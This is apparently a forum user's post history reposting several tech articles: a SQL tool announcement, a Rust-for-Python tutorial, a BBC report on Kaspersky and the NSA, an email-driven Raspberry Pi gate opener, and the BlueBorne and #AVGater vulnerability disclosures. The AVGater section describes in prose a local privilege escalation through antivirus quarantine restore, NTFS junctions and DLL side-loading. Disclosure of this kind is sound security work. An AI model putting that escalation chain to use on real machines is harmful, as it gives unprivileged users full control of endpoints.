Everything posted by Fi8sVrs
-
SQL Operations Studio

SQL Operations Studio is a data management tool that enables working with SQL Server, Azure SQL DB and SQL DW from Windows, macOS and Linux.

Download SQL Operations Studio Public Preview 1
- Windows: https://go.microsoft.com/fwlink/?linkid=862648
- macOS: https://go.microsoft.com/fwlink/?linkid=862647
- Linux: https://go.microsoft.com/fwlink/?linkid=862646

Feature Highlights
- Cross-Platform DB management for Windows, macOS and Linux with simple XCopy deployment
- SQL Server Connection Management with Connection Dialog, Server Groups, and Registered Servers
- Object Explorer supporting schema browsing and contextual command execution
- T-SQL Query Editor with advanced coding features such as autosuggestions, error diagnostics, tooltips, formatting and peek definition
- Query Results Viewer with advanced data grid supporting large result sets, export to JSON\CSV\Excel, query plan and charting
- Management Dashboard supporting customizable widgets with drill-through actionable insights
- Visual Data Editor that enables direct row insertion, update and deletion into tables
- Backup and Restore dialogs that enable advanced customization and remote filesystem browsing; configured tasks can be executed or scripted
- Task History window to view current task execution status, completion results with error messages and task T-SQL scripting
- Scripting support to generate CREATE, SELECT and DROP statements for database objects
- Workspaces with full Git integration and Find In Files support for managing T-SQL script libraries
- Modern light-weight shell with theming, user settings, full screen support, integrated terminal and numerous other features

Here's some of these features in action.

Contributing

If you are interested in fixing issues and contributing directly to the code base, please see the document How to Contribute, which covers the following:
- How to build and run from source
- The development workflow, including debugging and running tests
- Submitting pull requests

This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact opencode@microsoft.com with any additional questions or comments.

Privacy Statement

The Microsoft Enterprise and Developer Privacy Statement describes the privacy statement of this software.

License

Copyright (c) Microsoft Corporation. All rights reserved. Licensed under the Source EULA.

Download: sqlopsstudio-master.zip or git clone https://github.com/Microsoft/sqlopsstudio.git
Source: https://github.com/Microsoft/sqlopsstudio
-
What is Rust?

Rust is a systems programming language that runs blazingly fast, prevents segfaults, and guarantees thread safety. Featuring:
- zero-cost abstractions
- move semantics
- guaranteed memory safety
- threads without data races
- trait-based generics
- pattern matching
- type inference
- minimal runtime
- efficient C bindings

Description is taken from rust-lang.org.

Why does it matter for a Python developer?

The better description of Rust I heard from Elias (a member of the Rust Brazil Telegram Group).

There are a bunch of Rust packages out there to help you extend Python with Rust. I can mention Milksnake, created by Armin Ronacher (the creator of Flask), and also PyO3, the Rust bindings for the Python interpreter. See a complete reference list at the bottom of this article.

Let’s see it in action

For this post, I am going to use Rust Cpython; it’s the only one I have tested, it is compatible with the stable version of Rust and I found it straightforward to use.

Pros: It is easy to write Rust functions and import them from Python, and as you will see by the benchmarks it is worth it in terms of performance.

Cons: The distribution of your project/lib/framework will demand the Rust module to be compiled on the target system because of variation of environment and architecture; there will be a compiling stage which you don’t have when installing Pure Python libraries. You can make it easier using rust-setuptools or using MilkSnake to embed binary data in Python Wheels.

Python is sometimes slow

Yes, Python is known for being “slow” in some cases, and the good news is that this doesn’t really matter depending on your project goals and priorities. For most projects, this detail will not be very important. However, you may face the rare case where a single function or module is taking too much time and is detected as the bottleneck of your project performance; this often happens with string parsing and image processing.

Example

Let’s say you have a Python function which does some string processing. Take the following easy example of counting pairs of repeated chars, but have in mind that this example can be reproduced with other string processing functions or any other generally slow process in Python.

    # How many subsequent-repeated group of chars are in the given string?
    abCCdeFFghiJJklmnopqRRstuVVxyZZ... {millions of chars here}

Python is slow for doing large string processing, so you can use pytest-benchmark to compare a Pure Python (with Iterator Zipping) function versus a Regexp implementation.

    # Using a Python3.6 environment
    $ pip3 install pytest pytest-benchmark

Then write a new Python program called doubles.py:

    import re
    import string
    import random

    # Python ZIP version
    def count_doubles(val):
        total = 0
        # there is an improved version later on this post
        for c1, c2 in zip(val, val[1:]):
            if c1 == c2:
                total += 1
        return total

    # Python REGEXP version
    double_re = re.compile(r'(?=(.)\1)')

    def count_doubles_regex(val):
        return len(double_re.findall(val))

    # Benchmark it
    # generate 1M of random letters to test it
    val = ''.join(random.choice(string.ascii_letters) for i in range(1000000))

    def test_pure_python(benchmark):
        benchmark(count_doubles, val)

    def test_regex(benchmark):
        benchmark(count_doubles_regex, val)

Run pytest to compare:

    $ pytest doubles.py
    =============================================================================
    platform linux -- Python 3.6.0, pytest-3.2.3, py-1.4.34, pluggy-0.4.
    benchmark: 3.1.1 (defaults: timer=time.perf_counter disable_gc=False min_roun
    rootdir: /Projects/rustpy, inifile:
    plugins: benchmark-3.1.1
    collected 2 items

    doubles.py ..

    -----------------------------------------------------------------------------
    Name (time in ms)        Min               Max               Mean
    -----------------------------------------------------------------------------
    test_regex            24.6824 (1.0)     32.3960 (1.0)     27.0167 (1.0)
    test_pure_python      51.4964 (2.09)    62.5680 (1.93)    52.8334 (1.96)
    -----------------------------------------------------------------------------

Let’s take the Mean for comparison:
- Regexp – 27.0167 <– less is better
- Python Zip – 52.8334

Extending Python with Rust

Create a new crate

A crate is how we call Rust packages. Having Rust installed (the recommended way is https://www.rustup.rs/; it is also available in the Fedora and RHEL repositories via the rust-toolset), I used rustc 1.21.0.

In the same folder run:

    cargo new pyext-myrustlib

It creates a new Rust project in that same folder called pyext-myrustlib containing the Cargo.toml (cargo is the Rust package manager) and also a src/lib.rs (where we write our library implementation).

Edit Cargo.toml

It will use the rust-cpython crate as dependency and tell cargo to generate a dylib to be imported from Python.

    [package]
    name = "pyext-myrustlib"
    version = "0.1.0"
    authors = ["Bruno Rocha <rochacbruno@gmail.com>"]

    [lib]
    name = "myrustlib"
    crate-type = ["dylib"]

    [dependencies.cpython]
    version = "0.1"
    features = ["extension-module"]

Edit src/lib.rs

What we need to do:
- Import all macros from the cpython crate.
- Take the Python and PyResult types from CPython into our lib scope.
- Write the count_doubles function implementation in Rust; note that this is very similar to the Pure Python version except for:
  - It takes a Python as first argument, which is a reference to the Python Interpreter and allows Rust to use the Python GIL.
  - Receives a &str typed val as reference.
  - Returns a PyResult, which is a type that allows the raising of Python exceptions.
  - Returns a PyResult object in Ok(total) (Result is an enum type that represents either success (Ok) or failure (Err)), and as our function is expected to return a PyResult the compiler will take care of wrapping our Ok in that type (note that our PyResult expects a u64 as return value).
- Using the py_module_initializer! macro we register new attributes to the lib, including the __doc__, and also we add the count_doubles attribute referencing our Rust implementation of the function.
- Attention to the names libmyrustlib, initlibmyrustlib, and PyInit.
- We also use the try! macro, which is the equivalent to Python’s try..except.
- Return Ok(()) – The () is an empty result tuple, the equivalent of None in Python.

    #[macro_use]
    extern crate cpython;

    use cpython::{Python, PyResult};

    fn count_doubles(_py: Python, val: &str) -> PyResult<u64> {
        let mut total = 0u64;

        // There is an improved version later on this post
        for (c1, c2) in val.chars().zip(val.chars().skip(1)) {
            if c1 == c2 {
                total += 1;
            }
        }

        Ok(total)
    }

    py_module_initializer!(libmyrustlib, initlibmyrustlib, PyInit_myrustlib, |py, m | {
        try!(m.add(py, "__doc__", "This module is implemented in Rust"));
        try!(m.add(py, "count_doubles", py_fn!(py, count_doubles(val: &str))));
        Ok(())
    });

Now let’s build it with cargo:

    $ cargo build --release
        Finished release [optimized] target(s) in 0.0 secs

    $ ls -la target/release/libmyrustlib*
    target/release/libmyrustlib.d
    target/release/libmyrustlib.so*  <-- Our dylib is here

Now let’s copy the generated .so lib to the same folder where our doubles.py is located.

NOTE: on Fedora you must get a .so; on other systems you may get a .dylib, and you can rename it by changing the extension to .so.

    $ cd ..
    $ ls
    doubles.py pyext-myrustlib/

    $ cp pyext-myrustlib/target/release/libmyrustlib.so myrustlib.so

    $ ls
    doubles.py myrustlib.so pyext-myrustlib/

Having the myrustlib.so in the same folder or added to your Python path allows it to be directly imported, transparently as if it was a Python module.

Importing from Python and comparing the results

Edit your doubles.py now importing our Rust implemented version and adding a benchmark for it.

    import re
    import string
    import random
    import myrustlib   # <-- Import the Rust implemented module (myrustlib.so)

    def count_doubles(val):
        """Count repeated pair of chars in a string"""
        total = 0
        for c1, c2 in zip(val, val[1:]):
            if c1 == c2:
                total += 1
        return total

    double_re = re.compile(r'(?=(.)\1)')

    def count_doubles_regex(val):
        return len(double_re.findall(val))

    val = ''.join(random.choice(string.ascii_letters) for i in range(1000000))

    def test_pure_python(benchmark):
        benchmark(count_doubles, val)

    def test_regex(benchmark):
        benchmark(count_doubles_regex, val)

    def test_rust(benchmark):   # <-- Benchmark the Rust version
        benchmark(myrustlib.count_doubles, val)

Benchmark

    $ pytest doubles.py
    ==============================================================================
    platform linux -- Python 3.6.0, pytest-3.2.3, py-1.4.34, pluggy-0.4.
    benchmark: 3.1.1 (defaults: timer=time.perf_counter disable_gc=False min_round
    rootdir: /Projects/rustpy, inifile:
    plugins: benchmark-3.1.1
    collected 3 items

    doubles.py ...

    -----------------------------------------------------------------------------
    Name (time in ms)        Min                Max               Mean
    -----------------------------------------------------------------------------
    test_rust              2.5555 (1.0)       2.9296 (1.0)      2.6085 (1.0)
    test_regex            25.6049 (10.02)    27.2190 (9.29)    25.8876 (9.92)
    test_pure_python      52.9428 (20.72)    56.3666 (19.24)   53.9732 (20.69)
    -----------------------------------------------------------------------------

Let’s take the Mean for comparison:
- Rust – 2.6085 <– less is better
- Regexp – 25.8876
- Python Zip – 53.9732

The Rust implementation can be 10x faster than Python Regex and 21x faster than the Pure Python version. Interesting that the Regex version is only 2x faster than Pure Python 🙂

NOTE: Those numbers make sense only for this particular scenario; for other cases that comparison may be different.

Updates and Improvements

After this article was published I got some comments on r/python and also on r/rust. The contributions came as Pull Requests and you can send a new one if you think the functions can be improved.

Thanks to Josh Stone we got a better implementation for Rust which iterates the string only once, and also the Python equivalent.

Thanks to Purple Pixie we got a Python implementation using itertools; however this version is not performing any better and still needs improvements.

Iterating only once

    fn count_doubles_once(_py: Python, val: &str) -> PyResult<u64> {
        let mut total = 0u64;
        let mut chars = val.chars();
        if let Some(mut c1) = chars.next() {
            for c2 in chars {
                if c1 == c2 {
                    total += 1;
                }
                c1 = c2;
            }
        }
        Ok(total)
    }

    def count_doubles_once(val):
        total = 0
        chars = iter(val)
        c1 = next(chars, None)  # default avoids StopIteration on an empty string
        for c2 in chars:
            if c1 == c2:
                total += 1
            c1 = c2
        return total

Python with itertools

    import itertools

    def count_doubles_itertools(val):
        c1s, c2s = itertools.tee(val)
        next(c2s, None)
        total = 0
        for c1, c2 in zip(c1s, c2s):
            if c1 == c2:
                total += 1
        return total

New Results

    -------------------------------------------------------------------------------
    Name (time in ms)            Min                 Max                Mean
    -------------------------------------------------------------------------------
    test_rust_once             1.0072 (1.0)        1.7659 (1.0)       1.1268 (1.0)
    test_rust                  2.6228 (2.60)       4.5545 (2.58)      2.9367 (2.61)
    test_regex                26.0261 (25.84)     32.5899 (18.45)    27.2677 (24.20)
    test_pure_python_once     38.2015 (37.93)     43.9625 (24.90)    39.5838 (35.13)
    test_pure_python          52.4487 (52.07)     59.4220 (33.65)    54.8916 (48.71)
    test_itertools            58.5658 (58.15)     66.0683 (37.41)    60.8705 (54.02)
    -------------------------------------------------------------------------------

The new Rust implementation is 3x better than the old, but the python-itertools version is even slower than the pure python.

After adding the improvements to iterate the list of chars only once, Rust still has the advantage, from 1.1268 to 39.583.

Conclusion

Rust may not be yet the general purpose language of choice by its level of complexity and may not be the better choice yet to write common simple applications such as web sites and test automation scripts.

However, for specific parts of the project where Python is known to be the bottleneck and your natural choice would be implementing a C/C++ extension, writing this extension in Rust seems easy and better to maintain.

There are still many improvements to come in Rust and lots of other crates to offer Python <--> Rust integration. Even if you are not including the language in your tool belt right now, it is really worth keeping an eye open to the future!

References

The code snippets for the examples shown here are available in the GitHub repo: https://github.com/rochacbruno/rust-python-example.

The examples in this publication are inspired by the Extending Python with Rust talk by Samuel Cormier-Iijima at PyCon Canada. video here:

Also by My Python is a little Rust-y by Dan Callahan at PyCon Montreal. video here:

Other references:
- https://github.com/mitsuhiko/snaek
- https://github.com/PyO3/pyo3
- https://pypi.python.org/pypi/setuptools-rust
- https://github.com/mckaymatt/cookiecutter-pypackage-rust-cross-platform-publish
- http://jakegoulding.com/rust-ffi-omnibus/
- https://github.com/urschrei/polylabel-rs/blob/master/src/ffi.rs
- https://bheisler.github.io/post/calling-rust-in-python/
- https://github.com/saethlin/rust-lather

Join Community

Join the Rust community; you can find group links in https://www.rust-lang.org/en-US/community.html. If you speak Portuguese, I recommend you join https://t.me/rustlangbr, and there is the http://bit.ly/canalrustbr on YouTube.

Author

Bruno Rocha
Senior Quality Engineer at Red Hat
Teaching Python and Flask at CursoDePython.com.br
Fellow Member of Python Software Foundation
Member of RustBR study group
More info: http://about.me/rochacbruno and http://brunorocha.org

Source
Tagged with: elias gabriel amaral da silva, rust (and 4 more)
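A differential check of the count_doubles variants from the post above, written as an added example rather than code from the post or its GitHub repo: it runs each Python variant against an index-based reference on constructed edge cases (empty string, non-ASCII, repeated newlines), reports which ones disagree, and times them with timeit so no pytest-benchmark is needed. It assumes the compiled myrustlib.so from the post may or may not sit next to it and skips the Rust entry when the import fails; the function and variable names are the post's, the reference and the timing harness are new.

```python
"""Differential check and timing of the count_doubles variants (added example)."""
import itertools
import random
import re
import string
import timeit

try:
    import myrustlib  # the compiled extension from the post, only if built and copied here
except ImportError:
    myrustlib = None


def reference_count(val):
    """Index-based reference: number of i with val[i] == val[i + 1]."""
    return sum(1 for i in range(len(val) - 1) if val[i] == val[i + 1])


def count_doubles_zip(val):
    return sum(1 for c1, c2 in zip(val, val[1:]) if c1 == c2)


# The post's pattern: '.' does not match a newline unless re.DOTALL is set,
# so a repeated newline is silently skipped by this variant.
double_re = re.compile(r'(?=(.)\1)')


def count_doubles_regex(val):
    return len(double_re.findall(val))


double_re_dotall = re.compile(r'(?=(.)\1)', re.DOTALL)


def count_doubles_regex_dotall(val):
    return len(double_re_dotall.findall(val))


def count_doubles_once(val):
    """Single pass; next(chars, None) avoids StopIteration on an empty string."""
    total = 0
    chars = iter(val)
    c1 = next(chars, None)
    for c2 in chars:
        if c1 == c2:
            total += 1
        c1 = c2
    return total


def count_doubles_itertools(val):
    c1s, c2s = itertools.tee(val)
    next(c2s, None)
    return sum(1 for c1, c2 in zip(c1s, c2s) if c1 == c2)


IMPLEMENTATIONS = {
    "zip": count_doubles_zip,
    "regex": count_doubles_regex,
    "regex_dotall": count_doubles_regex_dotall,
    "once": count_doubles_once,
    "itertools": count_doubles_itertools,
}
if myrustlib is not None:
    # Rust's val.chars() yields Unicode scalar values, as Python's str iteration does.
    IMPLEMENTATIONS["rust"] = myrustlib.count_doubles

# Constructed edge cases: empty, single char, runs, non-ASCII, newlines, no doubles.
EDGE_CASES = ["", "a", "aa", "aaa", "abCCdeFFghiJJ", "ééx", "a\n\nb", "ab" * 5]


def disagreements(val):
    """Names of the implementations whose result differs from the reference."""
    expected = reference_count(val)
    return {name for name, fn in IMPLEMENTATIONS.items() if fn(val) != expected}


def benchmark(n_chars=200_000, repeats=3):
    """Best-of-N wall time in seconds per implementation on random letters."""
    val = ''.join(random.choice(string.ascii_letters) for _ in range(n_chars))
    return {
        name: min(timeit.repeat(lambda: fn(val), number=1, repeat=repeats))
        for name, fn in IMPLEMENTATIONS.items()
    }


if __name__ == "__main__":
    for case in EDGE_CASES:
        print(repr(case), reference_count(case), disagreements(case) or "all agree")
    for name, secs in sorted(benchmark().items(), key=lambda kv: kv[1]):
        print(f"{name:14s} {secs * 1000:8.3f} ms")
```

Running it shows that the regex variant returns 0 for "a\n\nb" while the zip, once and itertools variants return 1, because `.` does not match a newline without re.DOTALL; on the post's input of ASCII letters this never matters, but it is the kind of divergence a differential test catches before a faster implementation replaces a slower one. The timing figures depend on the machine and will not match the post's tables.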
-
Eugene Kaspersky has denied his company has worked with the Kremlin to hack others

The Russian-headquartered anti-virus company Kaspersky Lab has hit back at reports it deliberately extracted sensitive files from a US National Security Agency worker's computer.

The allegations stem from a Wall Street Journal report in early October. Russian hackers had used Kaspersky software to identify classified files on the NSA contractor's home computer, which they then stole, it said.

It later emerged Kaspersky had also copied files off the PC itself.

Image: An NSA contractor was said to have installed Kaspersky's software on a personal computer

But the company has now said this was not deliberate and any classified documents were destroyed.

It said its researchers had been investigating malicious software created by "the Equation Group", which is widely understood to be Kaspersky's codeword for the NSA. And this research had included looking for signatures relating to known Equation activity on machines running the company's software.

On 11 September 2014, the company said, one of its products deployed on a home computer with an internet protocol (IP) address in Baltimore, Maryland - close to where the NSA is based - had reported what appeared to be variants of the malware used by the Equation Group.

Image: Kaspersky Lab denies sharing any of the copied archive's files with third parties

Soon after, the user had disabled the Kaspersky Lab anti-virus tool and downloaded and installed pirated software infected with another, separate form of malware. And when the Kaspersky product had been re-activated, it had also detected this malware and new variants of Equation malware inside a 7zip archive - a file containing compressed documents.

This had been sent back to Kaspersky Lab and found to contain known and unknown Equation tools, source code and classified documents, indicating the user of the computer had been not a victim of Equation but one of its authors.

Eugene Kaspersky, the company's founder and chief executive, had then ordered the classified data should be deleted from the company's systems, and within days it had been.

Image: The scandal overshadowed Kaspersky's 20th anniversary celebrations earlier this month

Kaspersky had kept only the malware "binaries", computer code necessary to improve protection for its customers.

The Wall Street Journal report had said the Russian government had secretly scanned computers using Kaspersky software to spy on the US government - not necessarily with the company's knowledge.

Israeli intelligence

Kaspersky denies creating "signatures" specifically designed to search for top secret or classified material. And it has now said the only third-party intrusion in its networks was by Duqu 2.0 - malware linked to Israeli intelligence.

Following the Wall Street Journal report, the New York Times had reported that Israel had penetrated Kaspersky's networks in 2014 and alerted the US to the possibility of Kaspersky software being used for espionage.

Kaspersky has also said the separate form of malware not linked to the Equation Group that it had detected on the Maryland PC had been Smoke Bot or Smoke Loader, a Trojan created by a Russian hacker in 2012 and sold on Russian underground forums.

Prime target

And during this period the command-and-control servers of this malware were registered to what appeared to be a Chinese entity.

US federal agencies have now been told to remove all Kaspersky software from their computers.

Via bbc.com
Tagged with: eugene kaspersky, nsa breach (and 1 more)
-
Awesome Coding Videos Learn to code by watching free awesome video courses Source: www.awesomecodingvideos.com
-
Background

Recently while writing and testing some email related code I got annoyed and decided to make an easier way to automate listening for emails and performing actions when they arrive. The result is websocket.email and, to demonstrate how easy it is to use, let's make an email controlled gate opener using a raspberry pi and a tiny shell script.

The hardware
- A gate.
- A gate opener.
- A raspberry pi 3 with linux installed.
- A raspberry pi GPIO 'cobbler' breadboard adapter.
- A breadboard.
- An NPN transistor and a 1k resistor.

The abridged theory

When the button is pressed the circuit is powered, opening the gate. Transistors can also be configured to be an electronically controlled switch, and we can programmatically control the general purpose input/output pins of a raspberry pi to drive the transistor. This gives us the following circuit:

Assembly
- Replace the gate opener battery with the power supply on the breadboard using a soldering iron and solder; remember to write down which terminal is positive/negative.
- Replace the button with a transistor (use a multimeter and google to work out which way it goes) and resistor using a soldering iron and solder.
- Connect the gate opener input, power and ground into the breadboard and match it up with the labels on the 'cobbler'.
- Connect the 'cobbler' to the raspberry pi and breadboard.

voila:

The software
- wsemail compiled for the raspberry pi 3.
- A free api token generated from websocket.email.

Combined with the following bash script running on the raspberry pi 3:

    #! /bin/sh
    set -u

    export WEBSOCKETEMAIL_TOKEN=$(cat websocketemail_token.txt)
    # A secret id that people can't guess
    gateid=gate12345

    # initialize gpio
    echo 13 > /sys/class/gpio/export
    echo out > /sys/class/gpio/gpio13/direction

    while true
    do
      if wsemail -timeout 0 -for-address $gateid@websocket.email \
         | grep -q "open sesame"
      then
        # Trigger the gate if the email contained the secret incantation
        echo 1 > /sys/class/gpio/gpio13/value
        sleep 0.1
        echo 0 > /sys/class/gpio/gpio13/value
      fi
      # don't loop too fast if there is an error somewhere.
      sleep 1
    done

The code can be summarized as:
- Initialize passwords and GPIO.
- Loop forever waiting for an email to be sent to gate12345@websocket.email with the contents "open sesame".
- If the password is correct, pulse the GPIO switch, triggering the gate to open.

The code is MIT licensed on github.

The result

Step aside Amazon IOT, you are doing it wrong. Also, I know my email address is in the video, send me nice comments.

Conclusion

Interacting with the real world using software is a lot of fun and I encourage you to have a try at building something for yourself. These days you do not need to be an expert in electronics to make something that interacts with the physical world. websocket.email also did its job well, and I hope it can also be useful anywhere you need to interact with email accounts ... perhaps even unit/integration tests at your software job... wink wink. Happy hacking!

FAQ

What do you mean 20 lines of code... There is go code in there!?

20 lines of shell needed to solve the task at hand; wsemail is reusable, just like your OS kernel, cat and all the other software it also used that you didn't complain about... though you aren't totally wrong.

Why wouldn't you setup an smtp server on the device? Why add websocket crap?

NAT makes things annoying if you run the smtp server on the device, but I did setup an smtp server, and made a tiny api for it too :). Feel free to setup your own smtp server and use that instead.

Why wouldn't you use IMAP to poll the server?

Which server? which account? Am I retaining emails? Sounds annoying. In my opinion the current configuration is a bit simpler for this use case.

Source: acha.ninja
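The script above opens the gate for any email that contains the fixed phrase "open sesame", so the address plus the phrase is the whole credential: anyone who learns them, or who captures one such email in transit or from a mailbox, can replay it at will. An added example, not from the post or from websocket.email, of a stricter check the script could pipe wsemail's output into instead of grep: the command line carries a Unix timestamp, a one-time nonce and an HMAC-SHA256 over both under a secret shared with the sender, and the verifier rejects stale, replayed, forged and wrong-key commands. The message layout, the 120-second window, the secret and the stdin/exit-status convention are assumptions for the example.

```python
"""Authenticated, replay-resistant gate commands (added example)."""
import hashlib
import hmac
import secrets

WINDOW_SECONDS = 120  # assumed freshness window for a command


def _mac(secret, ts, nonce):
    # Tag covers the command word, the timestamp and the nonce together.
    msg = f"open {ts} {nonce}".encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def make_command(secret, now, nonce=None):
    """Sender side: one line 'open <unix-ts> <nonce> <hmac-sha256-hex>'."""
    ts = str(int(now))
    nonce = nonce or secrets.token_hex(8)
    return f"open {ts} {nonce} {_mac(secret, ts, nonce)}"


def verify_command(secret, body, now, seen, window=WINDOW_SECONDS):
    """Gate side: returns (accepted, reason).

    `seen` maps nonce -> timestamp of commands already honoured; entries
    older than the window are pruned because the stale check rejects them
    anyway, so the map stays small."""
    for old in [n for n, t in seen.items() if now - t > window]:
        del seen[old]
    # Find the first line that has the expected four-field shape.
    for line in body.splitlines():
        parts = line.strip().split()
        if len(parts) == 4 and parts[0] == "open":
            break
    else:
        return False, "no command"
    _, ts, nonce, tag = parts
    if not ts.isdigit():
        return False, "bad timestamp"
    if abs(now - int(ts)) > window:
        return False, "stale"
    if nonce in seen:
        return False, "replay"
    # Constant-time compare so a byte-by-byte timing leak cannot help forgery.
    if not hmac.compare_digest(_mac(secret, ts, nonce), tag):
        return False, "bad signature"
    seen[nonce] = int(ts)
    return True, "ok"


if __name__ == "__main__":
    import sys
    import time
    # Constructed placeholder; a deployment would load the key from a file
    # outside the repo and persist `seen` across runs instead of using {}.
    key = b"replace-with-a-long-random-secret"
    accepted, why = verify_command(key, sys.stdin.read(), time.time(), {})
    print(why)
    sys.exit(0 if accepted else 1)
```

In the shell loop this would replace the `grep -q "open sesame"` test with a pipe into `python3 gate_verify.py`, pulsing the GPIO pin only on exit status 0; the sender produces the line with make_command and the same secret. Because the nonce is recorded once accepted, the same email forwarded or delivered twice is rejected even inside the freshness window.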
-
Following the disclosure of the BlueBorne attack vector this past September, Armis discovered that critical Bluetooth vulnerabilities impact the Amazon Echo and Google Home. These new IoT voice-activated Personal Assistants join the extensive list of affected devices. Personal Assistants are rapidly expanding throughout the home and workplace, with an estimated 15 million Amazon Echo and 5 million Google Home devices sold. Since these devices are unmanaged and closed sourced, users are unaware of the fact their Bluetooth implementation is based on potentially vulnerable code borrowed from Linux and Android.

Which BlueBorne Vulnerabilities Impact the Devices?

Amazon Echo devices are affected by two vulnerabilities:
- Remote code execution vulnerability in the Linux Kernel (CVE-2017-1000251)
- Information leak vulnerability in the SDP Server (CVE-2017-1000250)

Other Echo products are affected by either the vulnerabilities found in Linux or those discovered in Android, since different Echo variants use different OSs.

Google Home devices are affected by one vulnerability:
- Information leak vulnerability in Android’s Bluetooth stack (CVE-2017-0785)

These vulnerabilities can lead to a complete takeover of the device in the case of the Amazon Echo, or lead to DoS of the Home’s Bluetooth communications.

What is the risk?

These devices are constantly listening to Bluetooth communications. There is no way to put an agent/antivirus on these devices. And given their limited UI, there is no way to turn their Bluetooth off – as is the case with other IoT devices (Smart TVs for example). With BlueBorne, hackers can take complete control over a vulnerable device, and use it for a wide range of malicious purposes, including spreading malware, stealing sensitive information and more.

According to a recent survey of Armis clients and deployments, 82% of companies (including the F1000 and G2000) have an Amazon Echo device in their corporate environment. In many cases, Corporate IT may not be aware that these IoT devices are even on the network. Given that airborne attacks are virtually invisible to traditional security solutions, a hacker only needs to exploit one device to penetrate further into a network or spread to other devices.

It is also worth mentioning that this is the first severe remote vulnerability found to affect the Amazon Echo, which was an impregnable wall up until now, with the only known vulnerability requiring an extensive physical attack.

Quick demo of how BlueBorne can be used to take control of an Amazon Echo:

Updates Have Been Provided

Armis has notified both Amazon and Google about the findings, and both companies have issued automatic updates for the Amazon Echo and Google Home. “Customer trust is important to us and we take security seriously. Customers do not need to take any action as their devices will be automatically updated with the security fixes,” says Amazon. Amazon Echo users can verify that their devices are using a version that is newer than v591448720, to validate they have received the patch.

Protecting IoT and Unmanaged Devices

The main concern arising from these new discoveries is this – what other devices are vulnerable? Unlike in the PC and mobile world, in which two or three main OSs control the absolute majority of the market, for IoT (or unmanaged) devices, no such dominant players exist. This creates an environment even more fragmented than the one currently seen with Android operating systems. An individual or company using an IoT device has no way of knowing whether a newly discovered vulnerability will affect them. If there is a patch, there may be a significant delay in getting the patch or it may be very complicated to apply. Too often, no patch is provided. The Amazon Echo and Google Home are the better examples as they were patched, and did not need user interaction to update. However, the vast bulk of IoT devices cannot be updated. Even the Echos and the Homes will eventually be replaced by new hardware versions (as Amazon and Google recently announced), and eventually the old generations will not receive updates – potentially leaving them susceptible to attacks indefinitely.

Amazon Echo is based on an old Linux Kernel version, and the Google Home is based on Android. The reason both companies chose to integrate their Bluetooth implementations from external sources is quite obvious – it is a complex protocol which was difficult to implement in the first place. It is more efficient to use the code embedded in the proprietary systems. However, it is not updated every time a new version is released. This means the device remains vulnerable to archaic attacks. Moreover, developers often refrain from implementing basic security measures such as stack protectors since they can be inconvenient, making the hacker’s job much easier.

IoT devices are no longer a negligible threat. They are becoming a cornerstone in every corporate environment and network. These personal assistants are increasingly popular with businesses. The Wynn Hotel in Las Vegas announced it will install an Amazon Echo in every room on the premises. The Best Western and Marriott hotels are considering doing the same thing, which will provide productivity and potential risks to consumers and business travelers. This trend will only increase in coming years. IoT devices are not only more prevalent today, but also subject to more attack vectors, with virtually no protection. The airborne attack vector is posing a severe threat to all IoT devices, and is completely overlooked by traditional security measures. Aside from BlueBorne, new Wi-Fi vulnerabilities were found in Broadcom’s chips (Broadpwn), as well as in the WPA2 protocol itself with the most recent Krack Attack. Users and businesses should treat IoT devices like any other device in their network, and implement proper protections.

For more information, or to perform a full IoT Security Assessment of your company, visit armis.com.

Via armis.com
Tagged with: cve-2017-1000251, cve-2017-1000250 (and 10 more)
-
As you may have noticed, it has been quite still here for a while. This was related to the preparations for this release: a post disclosing a new type of vulnerability, affecting multiple Anti-Virus solutions.

To summarize: Today, I’m disclosing an issue that can be exploited by any local user to gain full control over the endpoint by abusing the restore from quarantine Anti-Virus feature. And because every new vulnerability needs its own name and logo, I want to introduce you to #AVGater:

The Basics

But let’s get back on track by discussing a few Anti-Virus basics. The following diagram shows the inner workings of a typical AV from an unprivileged user’s point of view. There are three different access domains: the kernel mode, the privileged user mode (SYSTEM) and the unprivileged user mode. As shown in the following image, the different components have widely different duties:

Within the context of the unprivileged user there is only the AV user interface. By itself, it has no real power, because it’s executing within a limited user session. However, by talking to the AV Windows service it can do many things a normal user would not be able to. For example it may be allowed to restore files from the virus quarantine (This could be a hint – Couldn’t it?). Additionally there is a kernel component. Most likely it’s doing the real work of checking objects for known threat identifiers.

The Idea

So what’s the real point here? Well, if a non-privileged user were able to manipulate any of the communication channels that cross security boundaries (unprivileged user mode to privileged user mode, or privileged user mode to kernel mode) he could escalate his privileges. But how to do that? In the case of #AVGater, the answer to this question is: by manipulating the restore process from the virus quarantine:

As shown in the above video, #AVGater can be used to restore a previously quarantined file to any arbitrary filesystem location. This is possible because the restore process is most often carried out by the privileged AV Windows user mode service. Hence, file system ACLs can be circumvented (as they don’t really count for the SYSTEM user). This type of issue is called a privileged file write vulnerability and can be used to place a malicious DLL anywhere on the system. The goal is to side load this library for a legitimate Windows service by abusing the DLL Search Order:

If this succeeds, arbitrary code can be executed with the help of the DLLMain entry point. But there is still one very important question unanswered: How is it possible to tamper with the restore process? The solution is NTFS directory junctions. They are basically symbolic links for directories that can be created by anyone with the help of mklink.

#AVGater in plain English: By abusing NTFS directory junctions, the AV quarantine restore process can be manipulated, so that previously quarantined files can be written to arbitrary file system locations.

Putting it all together

With all this knowledge, we can now paint a complete attack scenario: First a malicious library is moved to the AV quarantine. Then, by abusing directory junctions, the original source path is redirected to another destination, most likely a folder within C:\Program Files or C:\Windows. By restoring the previously quarantined file, the SYSTEM permissions of the AV Windows user mode service are misused, and the malicious library is placed in a folder where the currently signed in user is unable to write to under normal conditions. Because of how the DLL search order works, it is finally loaded by another privileged Windows process. Thereby the code within the DLLMain of the malicious library is executed. Hence, a local non-admin attacker gained full control over the affected endpoint. Here’s a diagram illustrating the whole process:

During the preparation for this public disclosure, several different products have been checked for #AVGater. The following vendors have already released their fix. However, there are a few more to come!

Who is/was affected?

If anyone finds additional vulnerable products, please contact me. I will report them and update this list as soon as they have fixed the issue.

Getting our hands dirty

If you want to know more about how to exploit #AVGater in a real life scenario, I have good news for you: I have already fully documented two exploit vectors:

Local Privilege Escalation in Emsisoft Anti-Malware by abusing NTFS Directory Junctions #AVGater
Local Privilege Escalation in Malwarebytes 3 by abusing NTFS Directory Junctions #AVGater

Additionally, here are the slides of my talk “When your anti virus turns against you” from the IT SECX conference.

How to protect myself?

